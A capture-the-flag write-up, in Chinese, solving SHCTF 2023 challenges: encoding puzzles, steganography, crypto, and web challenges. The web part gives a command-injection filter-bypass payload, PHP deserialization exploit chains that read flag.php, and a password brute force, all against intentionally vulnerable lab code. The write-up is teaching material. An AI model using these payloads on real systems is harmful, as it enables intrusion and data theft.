SHCTF(山河)赛事部分Write up-白猫

2023-10-31 08:25:12 浏览数 (1)

SHCTF(山河)赛事部分Write up-白猫

MISC

[WEEK1]签到题

下载题目并打开:

base128编码: Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5 因为是base128编码,所以通过两次base64解码,即可得出flag

爆出flag: flag{this_is_flag} **总结: **

这道签到题主要考察了对base64编码的基础了解

[WEEK1]Steganography

下载题目并打开:

有三个文件,两个图片文件和一个压缩包文件 看到了flag压缩包,打开看一下

发现有flag文本文件存在,但是需要密码 那么密码信息可能在上面那两个图片文件中,直接放入到010浅浅分析一波

两个图片竟然一模一样,有点意思 在careful.jpg图片16进制字符串中发现了base64编码格式(==或=就是base64编码的重要特征)

MTJlcmNzLi4uLi45MDlqaw== 放到Kali里面浅浅解码一波

得到如下字符串 12ercs.....909jk 想到flag.txt需要用密码打开,猜测这个就是密码,但是呢,还有一个图片没有用上,所以这5个点显然不是密码。 把careful1.jpg放入到010分析一波

在16进制字符串中并没有发现什么有用的东西,只是一堆乱码,那么下一步该如何进行呢? 尝试查看一下careful1.jpg的图片属性,看看是否能有所突破 查看图片属性

出题人还是非常善良的,可以看到出题人在图片备注中给我们留了信息,刚好是5个字符对应了5个点

xqwed 12ercs.....909jk

密码: 12ercsxqwed909jk 打开flag.txt

爆出flag: **flag{4d72e4f3-4d4f-4969-bc8c-a2f6f7a4292c}**

[WEEK1]可爱的派蒙捏

下载题目文件,是一个压缩包,里面只有一张图片

放到010里面分析一波

图片隐写,发现存在两个文件txt1.txt和txt2.txt 放到Kali binwalk把这两个文本文件提取出来

提取成功,看看这两个文件里面是什么内容

刚开始我以为这是什么编码,看来是我想复杂了,经过这两个文件频繁切换,看到了有个别字符不同,大部分字符是相同的,想到了将不同字符提取出来,就是flag 拖入到物理机

复制到pycharm项目中

编写python脚本

代码语言:javascript复制
# 打开第一个文本文件并读取内容
with open('txt1.txt', 'r', encoding='utf-8') as file1:
    text1 = file1.read()
# 打开第二个文本文件并读取内容
with open('txt2.txt', 'r', encoding='utf-8') as file2:
    text2 = file2.read()
# 找出text2中与text1不同的字符
differences = []
for i, (char1, char2) in enumerate(zip(text1, text2)):
    if char1 != char2:
        differences.append(char2)
# 打印text2中与text1不同的字符
print("text2中与text1不同的字符:", ''.join(differences))

在代码中我做了注释,方便大家理解 运行python脚本

爆出flag: **flag{4ebf327905288fca947a}**

[WEEK1]message

下载题目并打开:

0001000D91683106019196F40008C26211002072B975915730671B54114F60000A000A592982B15C065265843D8A938A00000A000A5E8A9AA453D883525730000A000A91527CBE518D6E1751656CEA75D5000A000A6C899ED852305BF94E0D8D77000A000A8FD94E0053CC624B535191195230002062B14F4F4F6000530048004300540046007B00620061003900370038003400300035002D0062003100630038002D0038003400370063002D0038006500360039002D006600360032003100370037006500340063003000380037007D

有ABCDEF猜测是16进制编码,16进制转字符串一把梭

得出flag: SHCTF{ba978405-b1c8-847c-8e69-f62177e4c087}

[WEEK1] 真的签到

不再多说,跟着操作走即可 得出flag: flag{Welc0me_tO_SHCTF2023}

[WEEK2]远在天边近在眼前

下载题目并打开:

很明显flag就是所有文件的路径地址 考虑到路径地址复制下来有的符号会丢失,放入010打开

}/8/2/1/5/a/3/8/4/8/2/5/0/_/?/T/H/G/l/r/I/4/_/Y/s/A/3/_/y/l/L/A/e/r/_/s/i/_/S/i/H/t/{/g/a/l/f 反的flag,还这么长,不想手动排序了,写个python脚本梭一把

代码语言:javascript复制
ctf='}/8/2/1/5/a/3/8/4/8/2/5/0/_/?/T/H/G/l/r/I/4/_/Y/s/A/3/_/y/l/L/A/e/r/_/s/i/_/S/i/H/t/{/g/a/l/f'
flag=ctf[::-1]
flag=flag.replace('/','')#删除字符'/'
print(flag)

得出flag: flag{tHiS_is_reALly_3AsY_4IrlGHT?_0528483a5128}

[FINAL]问卷

跟着操作走即可

得出flag: flag{SHCTF_Round2_will_do_even_better!}

Web

[WEEK1]babyRCE

刚开始不要把题想的那么难,看下环境代码

代码语言:javascript复制
<?php
$rce = $_GET['rce'];
if (isset($rce)) {
	if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |;|[0-9]|*|`|%|>|<|'|"/i", $rce)) {
		system($rce);
		}	
else {
		echo "hhhhhhacker!!!"."n";
		}
} else {
	highlight_file(__FILE__);
}

一、PHP代码审计

  1. 可以明显看到给了一个GET方式传参,这个参数是rce
  2. if判断语句**,isset函数**用来判断rce这个参数是否存在并且是否不为空,如果条件达成,则true
  3. preg_match正则表达式,用来过滤一些命令,可以看到过滤了cat、more、less、head、tac、tail、nl、od、vi、vim、sort、flag等命令并且过滤了整数和空格以及一些常用符号
  4. system外部执行命令,将参数rce的值作为命令执行,从这里可以看出这道题降低了难度,因为我们不再需要外部执行命令了,所以直接给参数rce传值即可
  5. else与if语句联用,反之则输出对应的字符串
  6. 同5,highlight_file(FILE)函数用来高亮显示文件内容,就是把文件内容或者代码高亮显示到网页当中

二、解题思路

  1. 查看目录文件,幸运的是发现ls和/没有被过滤
  2. 绕正则,看它有没有漏掉的过滤命令,发现没有过滤uniq命令,uniq命令可以查看文件内容
  3. 绕正则,查看文件命令需要用到空格,结果发现空格被过滤,可以使用${IFS}代替空格
  4. 绕正则,flag被过滤,可以通过f???进行绕过,可以理解为列出包含f的四个字符文件

三、开始解题

  1. 使用ls命令查看目录文件

?rce=ls 回显结果

flag.php index.php

  1. 发现有flag.php文件的存在,尝试使用构造payload

?rce=uniq${IFS}f???.php 回显结果 空白内容,F12试试

代码语言:javascript复制
<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
$flag="dzctf{test_flag}";
}

getenv函数用来获取环境变量,flag的值等于这个环境变量的值 如果说flag是空的,则flag是dzctf{test_flag},显然这是不可能的 就是说这个目录下没有flag 那咱们去根目录下试试?

  1. 继续构造payload

?rce=uniq${IFS}/f???.php 发现网页内容为空,F12内容也是空 除了根目录下还有那里有?,猜测flag不是PHP文件,而是文本文件

  1. 继续构造payload

?rce=uniq${IFS}/f??? 回显flag

得出flag: flag{e85932a6-12df-4991-981c-adaf56337196}

[WEEK1]ez_serialize

题目环境:

代码语言:javascript复制
<?php
  highlight_file(__FILE__);

class A{
  public $var_1;

  public function __invoke(){
    include($this->var_1);
  }
}

class B{
  public $q;
  public function __wakeup()
  {
    if(preg_match("/gopher|http|file|ftp|https|dict|../i", $this->q)) {
      echo "hacker";           
    }
  }

}
class C{
  public $var;
  public $z;
  public function __toString(){
    return $this->z->var;
  }
}

class D{
  public $p;
  public function __get($key){
    $function = $this->p;
    return $function();
  }  
}

if(isset($_GET['payload']))
{
  unserialize($_GET['payload']);
}
  ?>

exp:

代码语言:javascript复制
<?php
  class A{
  public $var_1='php://filter/read=convert.base64-encode/resource=flag.php';
  }
  class B{
    public $q;
  }
class C{
  public $var;
  public $z;
}
class D{
  public $p;
}
$A=new A();
$B=new B();
$C=new C();
$D=new D();
$D->p=$A;
$C->var=$B;
$B->q=$C;
$C->z=$D;
echo serialize($C);

运行结果: O:1:"C":2:{s:3:"var";O:1:"B":1:{s:1:"q";r:1;}s:1:"z";O:1:"D":1:{s:1:"p";O:1:"A":1:{s:5:"var_1";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}} 上传exp:

PD9waHANCiRmbGFnID0gImZsYWd7NDQxZTY5NzEtMjU3NC00ZWYzLTg5YWYtYWQwNDYwMzA2NmUwfSI7DQo= base64解码:

得出flag: flag{441e6971-2574-4ef3-89af-ad04603066e0}

[WEEK1]登录就给flag

题目环境:

burpsuite抓包

初始账号:admin 初始密码:1

HTTP history

Send to Intruder

Clear 选中密码1,Add

Payloads

Load添加字典

打开字典

Start attack开始爆破

得到密码 password

账户:admin 密码:password

登录:

login登录:

得到flag: flag{d2974de6-f71e-48f9-9659-dc453a23009a}

[WEEK1]飞机大战

题目环境:

玩了一把,通过才给flag,所以说想玩通过是不可能的,只能另辟蹊径 F12查看网页源代码

HTML三大件 HTML CSS JavaScript CSS静态网页样式 JavaScript动态功能

所以说更改游戏分数必须看这个JS文件

没有看到可控游戏参数,倒是看到了一串u开头的类似编码的东西 有密码学基础的可以看出这是Unicode编码格式 u005au006du0078u0068u005au0033u0074u0068u0059u0057u0051u0033u005au0044u0041u0030u005au0043u0030u0030u004eu0047u0049u0030u004cu0054u0051u0032u004fu0054u0059u0074u0059u006au004eu006cu004eu0053u0030u007au004du007au0052u006bu004eu006au0064u0068u004eu007au004du0033u004eu0047u004eu0039u000a Unicode解码一把梭

base64 ZmxhZ3thYWQ3ZDA0ZC00NGI0LTQ2OTYtYjNlNS0zMzRkNjdhNzM3NGN9 base64解码一把梭

得到flag: flag{aad7d04d-44b4-4696-b3e5-334d67a7374c}

[WEEK2]no_wake_up

题目环境:

代码语言:javascript复制
<?php
highlight_file(__FILE__);
class flag{
public $username;
public $code;
public function __wakeup(){
$this->username = "guest";
}
public function __destruct(){
if($this->username = "admin"){
include($this->code);
}
}
}
unserialize($_GET['try']);

exp:

代码语言:javascript复制
<?php
  class flag
{
  public $username = "admin";
public $code = "php://filter/read=convert.base64-encode/resource=flag.php";
}
$l=new flag();
echo serialize($l);

运行结果: O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";} 上传payload

base64编码 PD9waHANCiRmbGFnID0gImZsYWd7MTE5NmY2NzQtZjkwMi00YWEzLWI5M2MtNTUyYTgxNTUzMjlkfSI7 base64解码

得出flag: flag{1196f674-f902-4aa3-b93c-552a8155329d}

Crypto

[WEEK1]立正

下载题目并打开

wl hgrfhg 4gNUx4NgQgEUb4NC64NHxZLg636V6CDBiDNUHw8HkapH :jdoi vl vlkw ~xrb wd nrrT Y: 一把梭:

得到flag: flag{Y0U_MU57_5t4nd_uP_r1gHt_n0W}

[WEEK1]Crypto_Checkin

下载题目并打开

QZZ|KQbjRRS8QZRQdCYwR4_DoQ7~jyO>0t4R4__aQZQ9|Rz k_Q!r#mR90 NR4_4NR%>ipO>0s{R90|SQhHKhRz k^S8Q5JS5|OUQZO}CQfp*dS8P&9R8>k?QZYthRz k_O>0#> base85(b)解码: R1kzRE1RWldHRTNET04yQ0dVMkRNT0JUR0UzVEdOS0dHTVlUT01aVklZMkRFTVpVRzRaVEdNWlZJWVpUR05TRkdZWlRHTUJXR1FaVEdOMkU= Base16-32-64-91混合多重解码: base64 R1kzRE1RWldHRTNET04yQ0dVMkRNT0JUR0UzVEdOS0dHTVlUT01aVklZMkRFTVpVRzRaVEdNWlZJWVpUR05TRkdZWlRHTUJXR1FaVEdOMkU= base32 GY3DMQZWGE3DON2CGU2DMOBTGE3TGNKGGMYTOMZVIY2DEMZUG4ZTGMZVIYZTGNSFGYZTGMBWGQZTGN2E base16 666C61677B546831735F31735F423473335F336E633064337D 三种base混合解码 得出flag: flag{Th1s_1s_B4s3_3nc0d3}

[WEEK1]残缺的md5

下载题目并打开:

使用python写脚本:

代码语言:javascript复制
import itertools
import string
import hashlib
def generate_strings():
    characters = "QWERTYUIOPLKJHGFDSAZXCVBNM012345689"
    for _ in itertools.product(characters, repeat=1):
        yield ''.join(_)
# 输入的固定部分
a = 'KCLWG'
b = 'K8M9O3'
c = 'DE'
e = '84S9'
# 计算目标MD5哈希值
target_md5_suffix = "b2ac4e6"
for part1 in generate_strings():
    for part2 in generate_strings():
        for part3 in generate_strings():
            str_to_hash = a   part1   b   part2   c   part3   e
            # 计算new_string的MD5哈希值
            md5_hash = hashlib.md5(str_to_hash.encode()).hexdigest()
            # 检查MD5哈希值的后七位是否与目标匹配
            if md5_hash[-7:] == target_md5_suffix:
                print("MD5加密前为:", str_to_hash)
                print("MD5加密后为:", md5_hash)

运行结果:

写个python脚本转大写

代码语言:javascript复制
flag='f0af1443b1f463eafff7aebb8b2ac4e6'
print(flag.upper())

运行结果:

得到flag: flag{F0AF1443B1F463EAFFF7AEBB8B2AC4E6}

[WEEK1]凯撒大帝

下载题目并打开:

凯撒移位

得到flag: flag{chutihaonan}

[WEEK1]进制

下载题目并打开:

16进制转字符串

哈希还原

得到flag: flag{ahfkjlhkah}

[WEEK1]okk

下载题目并打开:

Ook编码转文本

得到flag: flag{123456789}

[WEEK1]熊斐特

下载题目并打开:

Atbash Cipher(埃特巴什码)转化

得到flag: flag{atbash cipher}

[WEEK1]黑暗之歌

下载题目并打开:

盲文解密

base64解密

音符解密

得出flag: flag{b2cc-9091-8a29}

[WEEK1]迷雾重重

下载题目并打开:

二进制转摩斯密码 0为’.‘1为’-‘空格为’/' ..-./.-../.-/--./----.--/--/---/.-./..././..--.-/../.../..--.-/...-/./.-./-.--/..--.-/..-./..-/-./-----.- 摩斯密码解密

%u7b={ %u7d=}

得到flag: FLAG{MORSE_IS_VERY_FUN}

[WEEK1]难言的遗憾

下载题目并打开:

中文电码解密

得出flag: flag{一天不学高数我就魂身难受}

[WEEK1]小兔子可爱捏

下载题目并打开:

宇宙的终极答案是:42 Rabbit(兔子)解密

得到flag: flag{i_love_technology}

[WEEK1]what is m

下载题目并打开:

还原m即可 写个python脚本一把梭

代码语言:javascript复制
from Crypto.Util.number import long_to_bytes
m = 7130439814059477365465881592242189984174813803592711881640295679655301582414518361829827793806793804626699859619466410111590180160366476408654141662794502447303629472823901463632274384106877
flag=long_to_bytes(m)
print(flag)
#将m转为字节

运行结果:

得出flag: flag{th3re_4r3_S3veral_aITErnA7lvES_70_tHE_L0N6_7O_8Y73S_1UNcTION_dg12dC49bTf5}

PWN

[WEEK1]nc

nc连接

ls cat flag 一把梭

得到flag: flag{1dcc22cb-ae4d-4cb0-88f2-2e1461b1bb5c}

[WEEK1]hard nc

nc连接

ls cat flag ls gift2 cat gift2 cd gift2 ls cat flag2

base64编码 OTMtYTg3ZC0zN2FjMDljMGU1Njl9Cg== base64解码 93-a87d-37ac09c0e569} 好家伙只给了一半flag,再找找上半部分

ls -a查看隐藏目录文件 cat .gift

flag前半部分 flag{a284241c-5d85-46 前后合并 得出flag: flag{a284241c-5d85-4693-a87d-37ac09c0e569}

Reverse

[WEEK1]signin

下载题目并打开:

可执行文件 放入IDA进行分析

得到flag: flag{flag1sinarray}

后期我会去看看其他大佬师傅的WP,自己不会的看看能不能复现,太菜了,呜呜呜,争取给CTF新人做更好的题解;WP中有不足的地方还望师傅们积极提出。

0 人点赞